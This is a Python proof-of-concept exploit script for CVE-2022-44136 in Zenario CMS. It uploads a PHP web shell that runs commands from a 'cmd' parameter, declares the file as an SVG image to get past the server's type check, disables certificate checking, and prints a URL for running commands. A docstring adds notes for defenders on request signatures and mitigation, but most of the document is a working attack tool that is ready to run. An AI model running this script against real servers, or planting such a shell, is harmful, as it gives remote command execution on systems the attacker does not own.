#!/usr/bin/env python3
# CVE-2022-44136 Exploit - Zenario CMS Arbitrary File Upload
# Author: Ch35h1r3c47 (https://github.com/Ch35h1r3c47)
import requests
import sys
import argparse
import urllib3
# Suppress urllib3's InsecureRequestWarning for the whole process. The upload
# request in exploit() is sent with verify=False, so the server certificate is
# never validated; this line hides the warning that would otherwise report it.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(target_url, command):
    """
    Send the CVE-2022-44136 proof-of-concept upload to a Zenario CMS instance.

    A single multipart POST is made to the plugin AJAX upload endpoint. The
    part is named ``Filedata``, carries a ``.php`` filename, and declares its
    content type as ``image/svg+xml``. According to this PoC, the declared
    type is what lets the file pass the server's extension check.

    Args:
        target_url: Base URL of the instance; trailing slashes are stripped
            before the endpoint path is appended.
        command: Never sent by this function. It is only interpolated into the
            follow-up URL hint printed after an HTTP 200.

    Returns:
        None. Progress messages and the raw response body go to stdout.

    Notes for defenders:
        * Request signature: POST to ``/zenario/ajax.php`` with
          ``method_call=handlePluginAJAX`` and ``fileUpload`` in the query
          string, and a ``Filedata`` part whose filename extension disagrees
          with its declared Content-Type. The script attaches no cookies or
          credentials.
        * Follow-on indicator: GET requests for a ``.php`` file in an upload
          location carrying a ``cmd`` query parameter.
        * Mitigation: apply the vendor fix for this CVE, decide acceptance
          from the server-side extension and content rather than the
          client-declared type, and disable script execution in upload
          directories.
        * HTTP 200 is reported as "request sent", not as proof that the file
          was stored. The script does not verify the upload.
    """
    upload_name = "debug_module.php"
    upload_url = target_url.rstrip('/') + (
        "/zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload"
    )

    # Part body: PHP that passes the 'cmd' GET parameter to system().
    php_body = f"<?php system($_GET['cmd']); ?>"

    # One multipart/form-data part. The declared type (image/svg+xml) and the
    # .php filename deliberately disagree; that mismatch is the condition the
    # PoC depends on and the one a server-side check or WAF rule should reject.
    multipart = {'Filedata': (upload_name, php_body, 'image/svg+xml')}

    print(f"[*] Targeting: {target_url}")
    print(f"[*] Uploading malicious file: {upload_name}")

    rule = "-" * 30
    try:
        # verify=False: the server certificate is not validated.
        response = requests.post(upload_url, files=multipart, verify=False, timeout=15)

        if response.status_code != 200:
            print(f"[-] Upload failed. Status Code: {response.status_code}")
            return

        print("[+] Request sent successfully.")
        print("[+] Server Response:")
        print(rule)
        print(response.text)
        print(rule)
        print("[!] Check the server response for the uploaded file path.")
        # The path below is a placeholder; the real location is not derived here.
        print(f"[*] Suggested test: /path/to/uploaded/{upload_name}?cmd={command}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
if __name__ == "__main__":
    # Command-line entry point. --url is mandatory and is passed unchanged to
    # exploit(); --cmd only feeds the follow-up hint that exploit() prints.
    cli = argparse.ArgumentParser(description="Exploit PoC for CVE-2022-44136")
    cli.add_argument(
        "-u", "--url",
        required=True,
        help="Target Base URL (e.g., http://target.com)",
    )
    cli.add_argument(
        "-c", "--cmd",
        default="whoami",
        help="Command to execute (default: whoami)",
    )
    opts = cli.parse_args()
    exploit(opts.url, opts.cmd)